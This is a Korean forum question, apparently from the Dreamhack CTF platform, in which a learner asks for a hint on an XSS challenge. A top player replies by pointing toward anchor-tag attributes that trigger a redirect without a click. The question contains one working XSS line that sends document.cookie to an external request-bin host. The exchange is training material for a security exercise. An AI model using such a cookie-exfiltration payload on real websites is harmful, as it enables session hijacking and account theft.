GOSU분들 웹린이한테 힌트 하나만 투척 부탁드립니다
<a href="#" onclick="location.href='https://nezvnms.request.dreamhack.games/cookie='+document.cookie">xss</a>
이렇게 태그를 변경해서 글씨를 클릭하면 쿠키를 request bin으로 보내게 하였는데요. 직접 클릭해보니 쿠키가 잘 보내졌습니다.
근데 생각해보니까 HTML 태그를 변경하는건 어드민 봇이 할 땐 적용이 안되더라구요ㅋㅋㅋㅋ 거기다 어드민 봇이 글씨를 클릭할 일도 없구요ㅠㅠ
아예 길을 잘못 든것 같은데 자그마한 힌트 좀 주실 수 있을까요?
#web
작성자 정보
답변
1
Sechack
CTF First Place
음 a태그의 속성을 잘 찾아보시면 쓸만한게 좀 있을거에요. a태그의 속성을 이용해서 클릭이 아닌 조회만 해도 리다이렉트 되게끔 만들어보세요. 두개 이상의 속성이 연계되서 자동으로 리다이렉트 되게 할 수 있습니다.
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
